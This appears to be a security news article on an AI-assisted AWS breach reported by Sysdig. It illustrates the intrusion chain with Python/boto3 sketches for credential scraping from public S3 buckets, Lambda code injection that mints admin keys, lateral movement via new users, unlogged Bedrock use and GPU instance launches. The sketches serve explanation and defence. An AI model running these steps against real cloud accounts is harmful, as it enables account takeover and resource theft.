Threat actors tore through an Amazon Web Services environment in under eight minutes, chaining together credential theft, privilege escalation, lateral movement, and GPU resource abuse with the help of large language models. The attack unfolded so fast that defenders had virtually no time to react.
According to new findings from Sysdig’s Threat Research Team, the intruders turned a single exposed credential in a public S3 bucket into full administrative control, demonstrating how AI‑assisted automation has collapsed the cloud attack lifecycle from hours to mere minutes.
The operation, observed in November 2025, reportedly combined a cloud misconfiguration with large language models (LLMs) to compress the entire attack lifecycle.
“The cybersecurity world today is brand new,” said Ram Varadarajan, CEO at Acalvio. “In this threat environment, organizations have to accept that the speed of the breach has shifted from days to minutes. Autonomous intruders can now escalate from initial access to full administrative control in minutes.” Defending against this class of attacks, he added, demands “AI-focused technology” that can reason and respond at the same speed as automated attackers.
From public buckets to privilege escalation in minutes
The compromise began with valid AWS credentials left exposed in public S3 buckets. Those buckets contained AI-related data, and the associated IAM user had permissions to interact with Lambda and limited access to Amazon Bedrock. “This user was likely intentionally created by the victim organization to automate Bedrock tasks with Lambda functions across the environment,” Sysdig researchers said in a blog post shared with CSO ahead of its publication on Tuesday.
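Sysdig’s report does not describe the attacker’s tooling for this step, but pulling secrets from a world-readable bucket requires no AWS credentials at all. A minimal sketch of the pattern, assuming Python with boto3 and an invented bucket name:

```python
import boto3
from botocore import UNSIGNED
from botocore.config import Config

# Anonymous (unsigned) client: a public bucket needs no AWS credentials.
s3 = boto3.client("s3", config=Config(signature_version=UNSIGNED))
BUCKET = "example-ai-datasets"  # placeholder for the victim's bucket

for obj in s3.list_objects_v2(Bucket=BUCKET).get("Contents", []):
    # Config dumps and .env files are what credential scanners look for.
    if obj["Key"].endswith((".env", ".json", ".cfg")):
        body = s3.get_object(Bucket=BUCKET, Key=obj["Key"])["Body"].read()
        if b"AKIA" in body:  # long-term AWS access key IDs start with AKIA
            print("exposed credential candidate:", obj["Key"])
```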
With read access across the environment, the attacker rapidly enumerated AWS services, then escalated privileges by modifying an existing Lambda function. By injecting malicious code into a function that already had an overly permissive execution role, the attacker was able to create new access keys for an administrative user and retrieve them directly from the Lambda execution output.
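The write-up does not reproduce the injected code, but the escalation it describes could look roughly like the following boto3 sketch. The function and user names are invented, and the snippet assumes the target function’s handler is configured as index.handler:

```python
import io
import json
import zipfile

import boto3

# Injected payload: it runs under the Lambda's overly permissive execution
# role, mints keys for an existing admin user, and returns them in the output.
PAYLOAD = '''
import boto3

def handler(event, context):
    iam = boto3.client("iam")
    key = iam.create_access_key(UserName="admin-user")["AccessKey"]  # placeholder user
    return {"AccessKeyId": key["AccessKeyId"],
            "SecretAccessKey": key["SecretAccessKey"]}
'''

lam = boto3.client("lambda")

# Package the payload and overwrite the function's code: the step gated by
# the lambda:UpdateFunctionCode permission.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("index.py", PAYLOAD)
lam.update_function_code(FunctionName="bedrock-automation", ZipFile=buf.getvalue())
lam.get_waiter("function_updated").wait(FunctionName="bedrock-automation")

# Invoke the function and read the fresh admin keys from its output.
resp = lam.invoke(FunctionName="bedrock-automation")
print(json.load(resp["Payload"]))
```

The design point is that the attacker never needs iam:CreateAccessKey directly; the over-privileged execution role performs the sensitive call on their behalf.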
Jason Soroko, senior fellow at Sectigo, said the root cause was depressingly familiar. “We must look past the novelty of AI assistance to recognize the mundane error that enabled it,” he said. “The entire compromise began because the victim left valid credentials exposed in public S3 buckets. This failure represents a stubborn refusal to master security fundamentals.”
The Lambda code showed signs of LLM generation, including comprehensive exception handling, iterative targeting logic, and even non-English comments.
Lateral movement, LLMjacking, and GPU abuse
Once administrative access was obtained, the attacker moved laterally across 19 distinct AWS principals, assuming multiple roles and creating new users to spread activity across identities. This approach enabled persistence and complicated detection, the researchers noted.
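The exact sequence has not been published, but the identity-spreading pattern the researchers describe maps onto two ordinary API calls, roughly like this (the role and user names are placeholders):

```python
import boto3

sts = boto3.client("sts")

# Assume an existing role to operate under a second identity.
creds = sts.assume_role(
    RoleArn="arn:aws:iam::123456789012:role/service-role-example",
    RoleSessionName="maintenance",  # innocuous-looking session name
)["Credentials"]

# Build a client from the assumed role's temporary credentials.
iam = boto3.client(
    "iam",
    aws_access_key_id=creds["AccessKeyId"],
    aws_secret_access_key=creds["SecretAccessKey"],
    aws_session_token=creds["SessionToken"],
)

# Create a fresh user so later activity is logged under yet another principal.
iam.create_user(UserName="svc-automation-2")
iam.create_access_key(UserName="svc-automation-2")
```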
The attackers then shifted focus to Amazon Bedrock, enumerating available models and confirming that model invocation logging was disabled. The researchers said multiple foundation models were invoked, a pattern consistent with “LLMjacking,” in which stolen cloud credentials are used to run LLM workloads at the victim’s expense.
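The three Bedrock steps the researchers describe (enumeration, the logging check, and invocation) each map to a single API call. A hedged boto3 sketch, with the model ID and prompt chosen for illustration:

```python
import json

import boto3

bedrock = boto3.client("bedrock")
runtime = boto3.client("bedrock-runtime")

# Enumerate which foundation models the account can reach.
models = bedrock.list_foundation_models()["modelSummaries"]
print(len(models), "models visible")

# Check whether model invocation logging is configured; the key is absent
# when logging has never been turned on, so prompts leave no record.
cfg = bedrock.get_model_invocation_logging_configuration()
if "loggingConfig" not in cfg:
    # Invoke a model on the victim's bill: the core of LLMjacking.
    resp = runtime.invoke_model(
        modelId="anthropic.claude-3-haiku-20240307-v1:0",
        body=json.dumps({
            "anthropic_version": "bedrock-2023-05-31",
            "max_tokens": 256,
            "messages": [{"role": "user", "content": "Hello"}],
        }),
    )
    print(json.loads(resp["body"].read()))
```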
The operation then escalated into resource abuse. After preparing EC2 key pairs and security groups, the attackers attempted to launch high-end GPU instances for machine learning workloads. While the most powerful instance types failed to launch due to capacity limits, a costly GPU instance was eventually started, with scripts to install CUDA, deploy training frameworks, and expose a public JupyterLab interface.
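Launching the GPU capacity itself takes a single RunInstances call. A simplified sketch, in which the AMI, key pair, security group, and bootstrap script are all placeholders standing in for what Sysdig observed:

```python
import boto3

ec2 = boto3.client("ec2")

# Simplified stand-in for the observed bootstrap: install a training stack
# and expose JupyterLab to the internet with no authentication token.
USER_DATA = """#!/bin/bash
pip install jupyterlab torch
jupyter lab --ip 0.0.0.0 --port 8888 --no-browser --allow-root \\
    --NotebookApp.token='' &
"""

ec2.run_instances(
    ImageId="ami-0123456789abcdef0",            # placeholder deep learning AMI
    InstanceType="p4d.24xlarge",                # high-end GPU type, often capacity-limited
    KeyName="attacker-key",                     # key pair prepared earlier
    SecurityGroupIds=["sg-0123456789abcdef0"],  # group opened to public access
    MinCount=1,
    MaxCount=1,
    UserData=USER_DATA,
)
```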
Some of the code referenced nonexistent repositories and resources, which Sysdig researchers attributed to LLM hallucinations.
Experts argue that the most unsettling takeaway isn’t that AI introduced a new attack technique. It is that AI removed hesitation. “When you strip this attack down to its essentials, what stands out isn’t a breakthrough technique,” said Shane Barney, CISO at Keeper Security. “It’s how little resistance the environment offered once the attacker obtained legitimate access.” He warned that AI collapses reconnaissance, privilege testing, and lateral movement into “a single, rapid sequence,” eliminating the buffer time defenders have historically relied on.
To reduce exposure, Sysdig researchers advised enforcing least privilege across IAM users, roles, and Lambda execution roles, tightly limiting permissions such as lambda:UpdateFunctionCode and iam:PassRole, and ensuring sensitive S3 buckets are never public. Enabling Lambda versioning, turning on Amazon Bedrock model invocation logging, and monitoring for large-scale enumeration activity are also critical, they added.
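Of those recommendations, the Bedrock logging step is a single configuration call. A sketch assuming boto3, with a placeholder log group and role ARN that would need to exist in the account:

```python
import boto3

bedrock = boto3.client("bedrock")

# Record every model invocation (prompts included) to CloudWatch Logs,
# closing the blind spot the attackers checked for before invoking models.
bedrock.put_model_invocation_logging_configuration(
    loggingConfig={
        "cloudWatchConfig": {
            "logGroupName": "/aws/bedrock/model-invocations",               # placeholder
            "roleArn": "arn:aws:iam::123456789012:role/bedrock-logging",   # placeholder
        },
        "textDataDeliveryEnabled": True,
        "imageDataDeliveryEnabled": True,
        "embeddingDataDeliveryEnabled": True,
    }
)
```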